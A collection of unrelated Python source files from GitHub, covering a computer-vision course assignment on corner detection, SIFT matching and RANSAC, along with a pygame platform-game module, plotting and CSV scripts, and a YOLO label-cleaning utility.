if registered_model.is_valid_model_name(model_name):
params = registered_model.default_hparams()
params.model_hparams.model_name = model_name
return params
raise ValueError('No such model: {}'.format(model_name))
| he-zh/sparse-double-descent | models/registry.py | registry.py | py | 3,562 | python | en | code | 13 | github-code | 13 |
4192811681 | import torch
import matplotlib.pyplot as plt
from math import inf
import numpy as np
from utils.conf import args
def load_training_status(file_path:str) -> tuple:
print('loading '+file_path+'...')
checkpoint = torch.load(file_path, map_location=torch.device('cpu'))
records = checkpoint['records']
print(checkpoint['args'])
print('done')
return records
def EMA_smooth(l:list, alpha=0.05) -> list:
if len(l) == 0:
return l
new_l = [l[0]]
for i in l:
new_l.append(alpha * i + (1-alpha) * new_l[-1])
return new_l
def plot_training_into_1_figure(chk_points_paths:list, label_list:list) -> None:
for idx, file_path in enumerate(chk_points_paths):
records = load_training_status(file_path)
t_sim = records['training_spkh_lish_sim'][:] # records['training_sim']
t_sim = EMA_smooth(t_sim)
linewidth = 1.0
plt.plot(t_sim, label=label_list[idx], linewidth=linewidth)
plt.legend()
plt.xlabel('Number of Iterations')
plt.title('Topological Similarity Between Speaker Hidden and Listener Hidden')
plt.yticks(np.arange(0, 1, step=0.05))
plt.grid()
plt.show()
def main():
chk_point_path_list = [
'./params/compare_spkh_lish_sim/gen_game.tar',
'./params/compare_spkh_lish_sim/refer_game.tar'
]
label_list = [
'referential game',
'reconstruction game'
]
plot_training_into_1_figure(chk_point_path_list, label_list)
if __name__ == '__main__':
main()
| Shawn-Guo-CN/EmergentNumerals | analysis/compare_refer_gen_game.py | compare_refer_gen_game.py | py | 1,534 | python | en | code | 4 | github-code | 13 |
22205603026 | #!/usr/bin/env python
# coding: utf-8
# ## CSC420 Assignment 2
# ### Brendan Neal | 1001160236 | nealbre1
# Imports and some helper functions
# In[1]:
import numpy as np
from scipy import spatial
import cv2 as cv
import math
from matplotlib import pyplot as plot
# Make the plot a certain size
plot.rcParams["figure.figsize"] = [8, 6]
# Shows an image, and saves it if a filename is given
def display_image(img, file_name=None):
flt_img = img.astype(float)
img_max, img_min = np.max(flt_img), np.min(flt_img)
norm_img = (((flt_img - img_min) / (img_max - img_min)) * 255).astype(np.uint8)
if len(img.shape) == 2:
plot.imshow(norm_img, cmap='gray')
elif (len(img.shape) == 3):
plot.imshow(cv.cvtColor(norm_img, cv.COLOR_BGR2RGB))
plot.show()
if file_name:
cv.imwrite(file_name, norm_img)
def show_scatter_plot(inputs, function, x_label, y_label):
"""
Displays the scatter-plot of repeatedly applying function to the elements of inputs.
X axis = input
Y axis = function(input)
"""
inps = list(inputs)
plot.scatter(inps, [function(x) for x in inps])
plot.xlabel(x_label)
plot.ylabel(y_label)
plot.show()
# #### Question 1a: Harris/Brown Corner Metric Implementation
# In[2]:
def derivative(float_img, kernel_size, x_degree, y_degree):
return cv.Sobel(
float_img, cv.CV_64F,
x_degree, y_degree,
ksize=kernel_size
)
def gauss_blur(float_img, sigma=1):
return cv.GaussianBlur(
float_img,
ksize=(0, 0),
sigmaX=sigma, sigmaY=sigma
)
def corner_components(float_img):
blurred = gauss_blur(float_img)
i_x = derivative(blurred, 5, 1, 0)
i_y = derivative(blurred, 5, 0, 1)
i_x2 = gauss_blur(i_x ** 2)
i_y2 = gauss_blur(i_y ** 2)
i_xy = gauss_blur(i_x * i_y)
det = (i_x2 * i_y2) - (i_xy ** 2)
trace = i_x2 + i_y2
return det, trace
def harris_corners(float_img, k):
assert (0.04 <= k <= 0.06)
det, trace = corner_components(float_img)
return det - (k * (trace ** 2))
def brown_corners(float_img):
# Ignore division by 0 errors
with np.errstate(divide='ignore', invalid='ignore'):
det, trace = corner_components(float_img)
divided = det / trace
# Dividing by 0 produces NAN, so ignore these pixels by setting them to maximum
return np.nan_to_num(divided, np.nanmax(divided))
# Applying the above code to *building.jpg*
# In[3]:
building = cv.imread("building.jpg", cv.IMREAD_GRAYSCALE).astype(np.float32)
display_image(building)
harris_building = harris_corners(building, 0.05)
display_image(harris_building, "q1A-harris-output.jpg")
brown_building = brown_corners(building)
display_image(brown_building, "q1A-brown-output.jpg")
# The second and third images above are the Harris (R) and Brown (Harmonic Mean) corner metrics, respectively.
#
# They have been displayed in a normalized fashion (0 corresponds to original minimum pixel value, 255 to original maximum pixel value).
#
# We can see that the Harris response metric produced an image with much higher variance than the Brown counterpart - most of the Harris response is gray. This is because the distribution of pixels in the Harris response seems to cover both positive and negative values, whereas the Brown response is mostly positive.
# #### Question 1a: Non-Maximal Suppression
# In[4]:
# Copied from A1
def patch_view(arr, patch_h, patch_w):
"""(numpy.array, int, int) -> numpy.array
Creates a 4D, read-only view of some 2D numpy array as a 2D array of 2D patches.
There are (arr_height x arr_width) patches and each patch is of size (patch_h, patch_w)
:param arr: some 2D numpy array
:param patch_h: desired height for patches
:param patch_w: desired width for patches
:return: 4D array of (patch_h x patch_w) patches
"""
assert len(arr.shape) == 2
# Numpy stride code examples (magic):
# https://stackoverflow.com/questions/16774148/
# https://github.com/keras-team/keras/issues/2983
# New height and width are now going to be in terms of
# number of overlapping patches we can fit into arr
new_h, new_w = np.array(arr.shape) - np.array([patch_h, patch_w]) + 1
return np.lib.stride_tricks.as_strided(
np.ascontiguousarray(arr),
shape=(new_h, new_w, patch_h, patch_w),
strides=arr.strides + arr.strides,
writeable=False
)
def circular_mask(radius):
"""(int -> numpy.array)
Creates a 2D-boolean mask of a circle with radius radius.
Returns a 2D, square array with side length size 2*radius + 1
"""
diameter = 2*radius + 1
center_x = center_y = radius
x, y = np.indices((diameter, diameter))
distances = ((center_x - x) ** 2 + (center_y - y) ** 2) ** 0.5
return (distances <= radius)
def zero_padded(arr, thickness):
return np.pad(
arr, ((thickness, thickness), (thickness, thickness)),
mode='constant', constant_values=0
)
def non_maximal_suppression(float_img, radius, circle):
# Radius should be odd
# (e.g. radius k -> patch of size (2k + 1)x(2k + 1))
patch_size = (radius * 2) + 1
# Pad the given image so the number of patches == number of pixels
padding = patch_size // 2
padded = zero_padded(float_img, padding)
# 2D Array of 2D patches
patches = patch_view(padded, patch_size, patch_size)
# Create mask for suppression in neighbourhood
# (when taking maximum of patch, ignore pixels outside the mask)
mask = circular_mask(radius) if circle else np.ones((patch_size, patch_size))
patch_maxes = np.empty(float_img.shape)
patch_maxes[:, :] = np.amax(patches[:, :] * mask, axis=(2, 3))
# Suppress pixels that are NOT the maximum within their patches
ret = np.copy(float_img)
ret[ret != patch_maxes] = 0
return ret
# In[5]:
for radius in [2, 4, 8]:
display_image(
non_maximal_suppression(brown_building, radius, circle=True),
f"q1B-nonmax-suppression-output-r={radius}.jpg"
)
# Note: Please see the raw image files attached in the submission. The PDF doesn't seem to treat isolated pixels very nicely.
#
# We can see that as r increases, the amount of detected details decreases. This difference can be seen clearly between the 2 and 8-radius images. Particular areas of interest where fine details are displayed much more apparently are:
#
# Building on the left-hand side, in particular the decorative window frames
#
# Corners of the windows belonging to the distant tower on the right
#
# Corners of the window-frames on the center building
#
# The granularity of the high-response regions is inversely proportional to the radius of non-maximal suppression. This is because a larger radius causes the algorithm to inspect a wider neighbourhood. Therefore, the chance that the center pixel is a maximum is much lower, so it has a higher chance of being suppressed. For pixels in the same neighbourhood, pixels that correspond to fine details are more likely to be suppressed as they will have smaller response values.
# #### Question 1c: Blob Detection via Laplacian
# In[6]:
def gauss_pyramid(float_img, sigma = 1.6):
"""
Yields a sequence of tuples of the following form:
(img, scale)
img : i-th halving of float_img
scale : 2 ** i
"""
# Figure out how many times the image can be halved
shortest_side = min(float_img.shape)
num_reductions = int(np.log2(shortest_side)) - 1
cur_image = float_img
for i in range(num_reductions):
scale = 2 ** i
yield cur_image, scale
# Move onto a blurred and halved version of the image
cur_image = cv.pyrDown(cur_image)
def gauss_octave(float_img, length, sigma = 1.6):
"""
Yields a sequence of length-many tuples of the following form:
(img, blur_width)
img: i-th gaussian blurring of float_img
blur_width: sigma of the gaussian blur
"""
scaling_factor = 2 ** (1 / length)
for i in range(length):
blur_width = sigma * (scaling_factor ** i)
yield gauss_blur(float_img, blur_width), blur_width
def laplace_octave(float_img, octave_length, sigma = 1.6):
"""
Yields a sequence of length-many tuples of the following form:
(img, blur_width)
img: absolute laplacian of the i-th gaussian blurring of float_img
blur_width: sigma of the gaussian blur
"""
for img, blur_width in gauss_octave(float_img, octave_length, sigma):
laplace = np.abs(cv.Laplacian(img, ddepth=cv.CV_32F, ksize=5, scale=1))
yield laplace, blur_width
def laplace_maxima_suppression(cur_img, neighbours):
"""
Suppresses points (sets to 0) iff they are NOT maxima across:
Their surrounding 3x3 patch
The corresponding 3x3 patches in neighbours
"""
# 0-Padding of thickness 1 for each image
cur_pad = zero_padded(cur_img, 1)
neighs_padded = [zero_padded(x, 1) for x in neighbours]
# 3x3 patch views of each image
cur_patches = patch_view(cur_pad, 3, 3)
neigh_patches = [patch_view(x, 3, 3) for x in neighs_padded]
# Max of each patch, then across all patches
cur_max = np.amax(cur_patches, axis=(2, 3))
neigh_maxes = [np.amax(x, axis=(2, 3)) for x in neigh_patches]
all_max = np.amax(np.dstack([cur_max] + neigh_maxes), axis=2)
# True iff pixel of cur_img is a maximum across
# local neighbourhood and neighbouring neighbourhoods
is_cur_max = np.equal(cur_img, all_max)
# Suppress the pixels that don't count
return cur_img * is_cur_max
def laplace_octave_suppression(octave):
"""
Performs laplace_maxima_suppression over the following groups of images in octave:
(first, [second])
(intermediate, [intermediate - 1, intermediate + 1])
(penultimate, [last])
Returns a list of the results.
"""
# Check first against second
ret = [
laplace_maxima_suppression(octave[0], [octave[1]])
]
# Check middle sections against up and down neighbours
for i in range(len(octave) - 2):
(down, cur, up) = octave[i:i+3]
ret += [laplace_maxima_suppression(cur, [down, up])]
# Check last against second last
ret += [laplace_maxima_suppression(octave[-1], [octave[-2]])]
return ret
def laplace_octave_maxima(float_img, octave_length, sigma = 1.6):
"""
Return the responses, coordinates and blur widths of the pixels
that are local maxima within octave/scale.
Returns a numpy array of form [[response, y, x, blur width]]
"""
# Store and unpack the laplace octave
tups = list(laplace_octave(float_img, octave_length, sigma))
laplaces = [x[0] for x in tups]
blur_widths = np.array([x[1] for x in tups])
# Suppress the maxima of the octave
suppressed = laplace_octave_suppression(laplaces)
# For each vector which index has the highest response?
stacked = np.dstack(suppressed)
max_response_ind = np.argmax(stacked, axis=2)
# Determine maximum response and corresponding blur widths
max_responses = np.amax(stacked, axis=2)
pixel_blur_widths = blur_widths[max_response_ind]
# Get the blur width and response of each maxima
maxima_coords = np.nonzero(max_responses)
blurs_of_maxima = pixel_blur_widths[maxima_coords]
responses = max_responses[maxima_coords]
# Merge the arrays together
return np.array([responses, *maxima_coords, blurs_of_maxima]).transpose()
def laplace_maxima(float_img, octave_length, sigma = 1.6):
"""
Return the responses, SCALED coordinates and blur widths of the pixels
that are maxima across all octaves.
Returns a numpy array of form [[response, y, x, blur width]]
"""
arrays = []
for img, scale in gauss_pyramid(float_img, sigma):
oct_max = laplace_octave_maxima(img, octave_length, sigma)
oct_max[:, 1:] *= scale
arrays += [oct_max]
return np.concatenate(arrays)
def show_laplace_interest_pts(float_img, octave_length, sigma = 1.6, percentile = 80):
# Create color channel image
ret = np.dstack([np.copy(float_img)] * 3)
maxima = laplace_maxima(float_img, octave_length, sigma)
threshold = np.percentile(maxima[:, 0], percentile)
for (response, y, x, blur_width) in maxima:
if response > threshold:
radius = blur_width * (2 ** 0.5)
cv.circle(ret, (int(x), int(y)), int(radius), (0, 255, 0), 2)
return ret
# In[7]:
synthetic = cv.imread("synthetic.png", cv.IMREAD_GRAYSCALE).astype(np.float32)
display_image(synthetic)
# Run algorithm, show interest points with 97th percentile response or higher
synth_interest_pts = show_laplace_interest_pts(
synthetic,
octave_length = 5,
sigma = 7,
percentile = 97
)
display_image(synth_interest_pts, "q1c-output.jpg")
# #### Question 1d: Other Feature Detector (SURF)
#
# More info:
# https://en.wikipedia.org/wiki/Speeded_up_robust_features
#
# SURF stands for "Speeded Up Robust Features".
#
# SURF follows the same high-level steps as SIFT. However, the implementation of some steps is different. Most of the changes are made so that SURF performs much faster than SIFT.
#
# Some differences in implementation (arranged by high-level step):
#
# * **Scale Invariant Feature Detection**: find image interest points across many scales (reduce the search space for matching images)
# * SIFT: Use Difference-of-Gaussians across an image pyramid to approximate Laplacian. Extrema are interest points.
# * SURF: Use determinants of Hessian Matrices across increasing blur-filter sizes to determine extrema
# * Speedup 1: use a box-filter (simple sum) instead of Gaussian filter
# * Speedup 2: box-filter computation can be sped up using integral of image (sums of patches)
#
#
# * **Interest Point Orientation**: determine orientation of interest points (for rotational invariance)
# * SIFT: Use arc-tangent, gradients of gaussians and neighbourhood historgrams
# * SURF: Use Haar wavelet responses in interest point neighbourhoods
#
#
# * **Descriptor Generation**: encode enough information about an interest point into a high-dimensional vector such that distance metrics can be used for robust matching
# * SIFT: Use histograms of gradients (oriented relative to a dominant gradient direction) to compute the vector
# * SURF: Use Gaussian weighting instead of histogram, and smaller/less neighbourhoods to produce lower-dimensional vector
# In[8]:
def draw_surf_keypoints(img, hessian_threshold):
surf = cv.xfeatures2d.SURF_create(hessian_threshold)
keypoints, descriptors = surf.detectAndCompute(img, None)
ret = cv.drawKeypoints(img, keypoints, None, (0, 255, 0), 4)
return ret
building_color = cv.imread("building.jpg")
synth_color = cv.imread("synthetic.png")
# Picking fairly high Haar thresholds to limit number of keypoints drawn
surf_synth = draw_surf_keypoints(synth_color, 15000)
display_image(surf_synth, "q1d-surf-synth-output.jpg")
surf_building = draw_surf_keypoints(building_color, 3000)
display_image(surf_building, "q1d-surf-building-output.jpg")
# #### Question 2: SIFT Matching
#
# Note: I'm going to be using the SIFT feature extractor provided with opencv_contrib.
# #### Question 2a: SIFT Keypoint / Feature Extraction
# In[9]:
def extract_sift_data(img):
sift = cv.xfeatures2d.SIFT_create(1000)
keypoints, descriptors = sift.detectAndCompute(img, None)
return keypoints, descriptors
def draw_sift_keypoints(img, keypoints):
return cv.drawKeypoints(img, keypoints, None, (0, 255, 0), 4)
book = cv.imread("book.jpeg")
book_kp, book_desc = extract_sift_data(book)
display_image(draw_sift_keypoints(book, book_kp), "q2a-book-output.jpg")
find_book = cv.imread("findBook.png")
find_book_kp, find_book_desc = extract_sift_data(find_book)
display_image(draw_sift_keypoints(find_book, find_book_kp), "q2a-find-book-output.jpg")
# #### Question 2b: Matching SIFT Keypoints
# In[10]:
def match_sift_descriptors(left, right, threshold):
"""
Returns a 2D array of form [[i, j, distance]], where
i - index of a vector in left
j - index of the closest matching vector in right
distance - integer distance between vectors i, j
Results are sorted by the distance of the vector pairs.
"""
# Return empty if either left or right is empty
left_empty = (left is None) or (len(left) == 0)
right_empty = (right is None) or (len(right) == 0)
if left_empty or right_empty:
return np.empty((0, 3)).astype(int)
# [i, j]-th is euclidean distance between left[i], right[j]
euc_dists = spatial.distance.cdist(left, right, 'euclidean')
# [i, j]-th is the index of the j-th closest right-vector to left[i]
sort_inds = np.argsort(euc_dists, axis=1)
# top 2 matches are represented by first and second columns of above
closest, closest2 = sort_inds[:, 0], sort_inds[:, 1]
# Compute distance ratios between (left, first closest right) vs. (left, second closest left)
left_inds = np.arange(left.shape[0])
dist_ratios = euc_dists[left_inds, closest] / euc_dists[left_inds, closest2]
# Suppress where distance ratio is above some threshold
suppressed = dist_ratios * (dist_ratios < threshold)
# Get indices where suppression didn't happen
left_inds = np.nonzero(suppressed)[0]
right_inds = closest[left_inds]
# Pair the above indices together, determine distance of pair
pairs = np.stack((left_inds, right_inds)).transpose()
pair_dists = euc_dists[pairs[:, 0], pairs[:, 1]]
sorted_dist_inds = np.argsort(pair_dists)
sorted_pairs = pairs[sorted_dist_inds]
sorted_dists = pair_dists[sorted_dist_inds].reshape((sorted_pairs.shape[0], 1))
return np.hstack((sorted_pairs, sorted_dists)).astype(int)
# Note: instructions are very unclear, so I'm plotting the number of matches overall
# https://q.utoronto.ca/courses/51548/discussion_topics/113030
show_scatter_plot(
(x / 10 for x in range(1, 11)),
lambda x : match_sift_descriptors(book_desc, find_book_desc, x).shape[0],
"Threshold",
"Number of Matches"
)
# *Note: the instructions are unclear as to what threshold qualifies as the "best"*
#
# The best ratio seems to be around 0.8 (this is what SIFT uses).
#
# A threshold of 0.8 seems to be an inflection point in the number of generated matches.
#
# Beyond 0.8 it's likely that a lot of bad matches will start appearing - the second-closest descriptor is not far enough away from the "pivot" descriptor for the closest descriptor to be considered the "closest" (after accounting for noise).
#
# Intuition - if the top two players scored within 20% of each other in a noisy (performance-wise) contest, we can't really be sure whether the first player is actually better.
# #### Question 2c / Question 2d: Solving for Affine Transformation & Visualization
# The minimum $k$ needed to solve the affine transformation is 3.
#
# Recall equation from lecture 8B:
# $$P_{2k\times6} A_{6\times1} = P'_{2k\times1} \implies A = P^{-1}P'$$
#
# In order for $P$ to be invertible, it must be square.
# $$P_{m \times m} = P_{2k\times6} \implies m=2k=6 \implies 2k=6 \implies k=3$$
#
# Also note that the pseudo-inverse of $P$ only yields a proper solution when
# $$2k > 6 \implies k > 3$$
#
# In[11]:
# Left : Source, Right : Target
def keypoints_to_coords(keypoints):
"""
Converts keypoints into a numpy array of form [[x, y]]
"""
return np.array([kp.pt for kp in keypoints])
def affine_left_matrix(coords):
"""
Input: array of form [[x, y]]
Returns a 2D array of form
[
...
[x, y, 0, 0, 1, 0]
[0, 0, x, y, 0, 1]
...
]
"""
# Need to have 6 columns, and twice as many rows
ret_dims = (coords.shape[0] * 2, 6)
ret = np.empty(ret_dims, coords.dtype)
# Use numpy indexing
i = np.arange(coords.shape[0])
# Even Rows: [x, y, 0, 0, 1, 0]
ret[2*i, :2] = coords[i]
ret[2*i, 2:] = [0, 0, 1, 0]
# Odd Rows: [0, 0, x, y, 0, 1]
ret[2*i + 1, :2] = [0, 0]
ret[2*i + 1, 2:4] = coords[i]
ret[2*i + 1, 4:] = [0, 1]
return ret
def affine_right_matrix(coords):
"""
Returns a 2D array of form
[
[x]
[y]
...
]
"""
# Return array needs to be twice as long
ret = np.empty(coords.shape[0] * 2, dtype = coords.dtype)
# Use numpy indexing
i = np.arange(coords.shape[0])
# Even Rows = x
ret[2*i] = coords[i, 0]
# Odd Rows = y
ret[2*i + 1] = coords[i, 1]
return ret
def solve_affine_transform(left_kp_coords, right_kp_coords, k):
assert k >= 3
top_left, top_right = left_kp_coords[:k], right_kp_coords[:k]
assert top_left.shape == top_right.shape
# Using equation from lecture 8B: PA = P' -> A = P_inv * P'
P = affine_left_matrix(top_left)
P_prime = affine_right_matrix(top_right)
# Compute inverse using moore-penrose pseudo inverse
P_inv = np.linalg.pinv(P)
# Approximation of affine transformation vector (a, b, c, d, e, f)
(a, b, c, d, e, f) = np.matmul(P_inv, P_prime).flatten()
# The affine transformation matrix
return np.array(
[[a, b, e],
[c, d, f]]
)
def affine_transform(coords, transform_matrix):
"""
Computes the affine transform of coords (form [[x, y]]) with transform_matrix.
"""
# Add ones onto the end of every row, then transpose the matrix (columns are [x, y, 1])
num_pts, num_dims = coords.shape
with_ones = np.ones((num_pts, num_dims + 1))
with_ones[:, :-1] = coords
with_ones = with_ones.transpose()
# Array of form [[x...], [y...]]
transformed = np.matmul(transform_matrix, with_ones)
return transformed.transpose()
def draw_polygon(img, polygon_clockwise, color, thickness):
"""
Draws the polygon whose corner points are specified in clockwise order
in polygon_clockwise (array of form [[x, y]])
onto a copy of img.
"""
ret = np.copy(img)
num_corners = polygon_clockwise.shape[0]
for i in range(num_corners):
# Figure out which points to connect together
left_ind, right_ind = (i % num_corners), ((i + 1) % num_corners)
left, right = polygon_clockwise[left_ind], polygon_clockwise[right_ind]
# Draw a line between them (cv needs int tuples)
left_tup, right_tup = tuple(left.astype(int)), tuple(right.astype(int))
cv.line(ret, left_tup, right_tup, color, thickness)
return ret
def visualize_affine_transform(polygon_clockwise, img, transform_matrix):
"""
Visualizes the affine transformation of transform_matrix by drawing a
quadrilateral (corner points specified by quadr, an array of form [[x, y]], clockwise order)
onto a copy of right_img.
"""
# Transform the given polygon's corner points into new space
new_poly = affine_transform(polygon_clockwise, transform_matrix)
# Return the polygon drawn on the image
return draw_polygon(img, new_poly, (0, 255, 0), 3)
sift_matches = match_sift_descriptors(book_desc, find_book_desc, 0.8)
book_kp_coords = keypoints_to_coords(book_kp)[sift_matches[:, 0]]
find_book_kp_coords = keypoints_to_coords(find_book_kp)[sift_matches[:, 1]]
# Determine four corners of the book (clockwise order)
book_h, book_w = book.shape[:2]
book_quadr = np.array([
[0, 0], [book_w, 0],
[book_w, book_h], [0, book_h]
])
for k in range(3, 10, 2):
print("Affine matrix and transform visualization using top {} matches:".format(k))
matrix = solve_affine_transform(book_kp_coords, find_book_kp_coords, k)
print(matrix)
visualized = visualize_affine_transform(book_quadr, find_book, matrix)
display_image(visualized, "q2d-output-top-k={}.jpg".format(k))
print("")
# #### Question 2e : Color SIFT Matching
# In[12]:
def gray_to_color(gray_img, num_colors):
assert len(gray_img.shape) == 2
return np.dstack([gray_img] * num_colors)
def visualize_sift_color_matches(left_img, right_img, threshold, k):
"""
Algorithm (assume number of color channels identical)
1) Acquire SIFT keypoints and descriptors across each color channel
2) Match SIFT descriptors WITHIN color channels
Produce an array of form [[i, j, dist, channel]], where
i - index of the keypoint/descriptor in left_img
j - index of the keypoint/descriptor in right_img
dist - euclidean distance between i,j descriptors
channel - color channel the match occurred in
3) Merge the matches (across all channels) together, sort by distance and
take top k matches (lowest distance)
4) Use the tagged matches' keypoint coordinates
in the affine transformation calculation
Reasoning / Intuition: if a match is "strong" enough to make it
into the top-k, across all color channels, it's probably a match
"""
# Images should have same shape and number of color channels
assert [len(left_img.shape), len(right_img.shape)] == [3, 3]
assert left_img.shape[-1] == right_img.shape[-1]
# Grab number of colors (should be last element of shape)
num_colors = left_img.shape[-1]
# OpenCV's SIFT only works on color images for some reason, so
# replicate each color channel 3 times to make it pseudo-RGB
left_channels = (gray_to_color(left_img[..., i], num_colors) for i in range(num_colors))
right_channels = (gray_to_color(right_img[..., i], num_colors) for i in range(num_colors))
# Find keypoints and descriptors for left and right images
left_kps, left_descs = zip(*(extract_sift_data(channel) for channel in left_channels))
right_kps, right_descs = zip(*(extract_sift_data(channel) for channel in right_channels))
# Get matches within each channel, then tag with color channel number in last column
channel_matches = (
match_sift_descriptors(left_descs[i], right_descs[i], threshold)
for i in range(num_colors)
)
tagged_matches = (
np.hstack((matches, color * np.ones((matches.shape[0], 1)))).astype(int)
for (color, matches) in enumerate(channel_matches)
)
# Merge matches together, sort by distance (3rd element), then take top k
merged_matches = np.vstack([x for x in tagged_matches])
sorted_matches = merged_matches[np.argsort(merged_matches[:, 2])]
top_k_matches = sorted_matches[:k]
# Grab the points associated with each match
left_match_kp, right_match_kp = [], []
for (i, j, dist, channel) in top_k_matches:
left_match_kp += [left_kps[channel][i]]
right_match_kp += [right_kps[channel][j]]
# Convert keypoints into coordinates, then compute affine matrix
left_match_kp_coords = keypoints_to_coords(left_match_kp)
right_match_kp_coords = keypoints_to_coords(right_match_kp)
affine_matrix = solve_affine_transform(left_match_kp_coords, right_match_kp_coords, k)
# Determine four corners of the left (clockwise order)
left_h, left_w = left_img.shape[:2]
left_quadr = np.array([
[0, 0], [left_w, 0],
[left_w, left_h], [0, left_h]
])
# Visualize the affine transformation
return visualize_affine_transform(left_quadr, right_img, affine_matrix)
color_template = cv.imread("colourTemplate.png")
color_search = cv.imread("colourSearch.png")
display_image(visualize_sift_color_matches(color_template, color_search, 0.8, 7), "q2e-output.jpg")
# #### Question 3: RANSAC
#
# Recall: the minimum number of trials $S$ needed in order for RANSAC to produce a fitting model is
#
# $$S(P, p, k) =\frac{log(1-P)}{log(1-p^k)}$$
#
# Where:
#
# $P$ is the probability that the trials produce a fitting model
#
# $p$ is the proportion of inliers (number of inliers / number of points)
#
# $k$ is the number of points used to fit the model
# In[13]:
def S(P, p, k):
return math.log(1 - P) / math.log(1 - (p ** k))
# #### Question 3a: Plotting $k$ vs. $P(0.99, 0.7, k), k\in\{1...20\}$
# In[14]:
show_scatter_plot(
range(1, 21), lambda k : S(0.99, 0.7, k),
"k (Sample Size)",
"S (Number of Iterations to Fit with 99% probability)"
)
# #### Question 3a: Plotting $p$ vs. $P(0.99, p, 5), p\in[0.1, 0.5]$
# In[15]:
show_scatter_plot(
(x / 100 for x in range(10, 51)), lambda p : S(0.99, p, 5),
"p (Proportion of Inliers)",
"S (Number of Iterations to Fit with 99% probability)"
)
# #### Question 3c: RANSAC Analysis
#
# The required number of iterations is 14389 (14388.85, but we need to do one more iteration to achieve the minimum):
#
# $$S(P, p, k) =\frac{log(1-P)}{log(1-p^k)}$$
#
# $$P = 0.99, p = 0.2, k = 5 $$
#
# $$S(0.99, 0.2, 5) =\frac{log(1-0.99)}{log(1-0.2^5)} $$
#
# $$S(P, p, k)= \frac{-2}{log(1-0.00032)} $$
#
# $$S(P, p, k)= \frac{-2}{log(0.99968)} $$
#
# $$S(P, p, k)= \frac{-2}{-0.00013899647} $$
#
# $$ S(P, p, k)= 14388.85 $$
#
# The number of required iterations would *NOT* change.
#
# RANSAC will repeatedly propose and evaluate models for a set number of iterations, and then choose the best matching model out of all iterations. The algorithm won't stop early if it proposes a good model early on - it just keeps going to verify if that model is the best.
#
# The required number of iterations is dependent on a **prior** estimate of inlier probability. This is a hyper-parameter of the model and is chosen before runtime. The estimate may not align with the actual number of inliers for any given set of points. For the example given in this question, $p=0.2$ might be a little pessimistic, given that the model proposed after just a few iterations had an inlier proportion of almost 1/3.
| br3nd4nn34l/CSC420-Fall-2018 | assignments/a2/a2.py | a2.py | py | 30,486 | python | en | code | 0 | github-code | 13 |
73822458576 | import pandas as pd
import csv
# with pandas
df = pd.read_csv('weather_data.csv')
print(df)
print(df.nunique())
print(df.info())
temp_list = df['temp']
print(temp_list)
# with csv
with open('weather_data.csv') as data_file:
data = csv.reader(data_file)
temperature = []
day_week = []
week_condition = []
for row in data:
if row[1] != 'temp':
temperature.append(int(row[1]))
for row in data:
if row[0] != 'day':
day_week.append(row[0])
for row in data:
if row[2] != 'condition':
week_condition.append(row[2])
print(temperature)
print(day_week)
print(week_condition)
print(type(df))
| Marksman007577/Python-Usecase | Python 100 Days/Day 25/read_csv.py | read_csv.py | py | 678 | python | en | code | 0 | github-code | 13 |
24664088169 | import pygame
import random
import time
from src.load_image import load_image
class Platform(pygame.sprite.Sprite):
v0y = 400
def __init__(self, y, color, game_properties, *groups, **kwargs):
super().__init__(*groups)
self.game_properties = game_properties
self.x, self.y = random.randint(5, self.game_properties.width - 50), y
self.color = color
self.image = pygame.Surface((50, 30), pygame.SRCALPHA, 32)
self.rect = pygame.Rect(self.x, self.y, 50, 1)
pygame.draw.rect(self.image, pygame.Color(color), (0, 20, 50, 10))
def update(self):
if self.y <= self.game_properties.height:
self.y += self.game_properties.delta
else:
self.x = random.randint(10, self.game_properties.width - 60)
self.y = -50
self.rect.x, self.rect.y = int(self.x), int(self.y)
class MovingPlatform(Platform):
def __init__(self, y, color, *groups, **kwargs):
super().__init__(y, color, *groups, **kwargs)
self.vx = (random.randint(0, 1) * 2 - 1) * 50
self.border = (5, self.game_properties.width - 55)
self.last_change_time = time.time()
self.x0 = self.x
def update(self):
delta_time = time.time() - self.last_change_time
self.x = self.x0 + self.vx * delta_time
if self.x <= self.border[0] and self.vx < 0 or \
self.x >= self.border[1] and self.vx > 0:
self.last_change_time = time.time()
self.x0 = self.x
self.vx = -self.vx
super().update()
class BreakablePlatform(Platform):
def __init__(self, y, color, *groups, **kwargs):
self.time = -1
super().__init__(y, color, *groups, **kwargs)
def update(self):
if self.time + 0.5 < time.time() and self.time != -1:
self.destroyed()
if self.y <= self.game_properties.height:
self.y += self.game_properties.delta
else:
self.x = random.randint(10, self.game_properties.width - 60)
self.y = -50
pygame.draw.rect(self.image, pygame.Color("grey"), (0, 20, 50, 10))
self.rect.x, self.rect.y = int(self.x), int(self.y)
def broken(self):
self.time = time.time()
self.image = pygame.Surface((50, 30), pygame.SRCALPHA, 32)
pygame.draw.rect(self.image, pygame.Color("grey"), (0, 20, 15, 10))
pygame.draw.rect(self.image, pygame.Color("grey"), (18, 20, 14, 10))
pygame.draw.rect(self.image, pygame.Color("grey"), (35, 20, 15, 10))
def destroyed(self):
self.image = pygame.Surface((50, 30), pygame.SRCALPHA, 32)
self.time = -1
self.block = True
class Trampoline(Platform):
v0y = 650
def __init__(self, y, color, *groups, **kwargs):
super().__init__(y, color, *groups, **kwargs)
self.image = pygame.Surface((55, 40), pygame.SRCALPHA, 32)
self.image.blit(load_image('images/trampoline.jpg', 55, 20), (0, 20))
self.rect = pygame.Rect(0, 0, 55, 1)
pygame.draw.rect(self.image, pygame.Color(color), (0, 30, 55, 10))
class Spring(Platform):
v0y = 900
def __init__(self, y, color, *groups, **kwargs):
super().__init__(y, color, *groups, **kwargs)
self.image = pygame.Surface((55, 40), pygame.SRCALPHA, 32)
self.image.blit(load_image('images/spring.jpg', 55, 20), (0, 20))
self.rect = pygame.Rect(0, 0, 55, 1)
pygame.draw.rect(self.image, pygame.Color(color), (0, 30, 55, 10))
| VileHero-Alex/python_project_doodle_jump | src/platforms.py | platforms.py | py | 3,637 | python | en | code | 0 | github-code | 13 |
34510790322 | # Author: Logan deLaar
# Github: Logandelaar1
import glob
import os
# Change 'your_directory_path' to your directory path
directory_path = 'path/to/lables/folder/in/downloaded/roboflow/folder'
# Use glob to get all .txt files in the directory
for filename in glob.glob(os.path.join(directory_path, '*.txt')):
with open(filename, 'r') as file:
# Read all lines in the file
lines = file.readlines()
with open(filename, 'w') as file:
# Write back only lines that don't start with '0'
for line in lines:
if not line.startswith('0'):
file.write(line)
| logandelaar1/Yolo-Data-Parser | yolodataparser_autodelete.py | yolodataparser_autodelete.py | py | 620 | python | en | code | 0 | github-code | 13 |
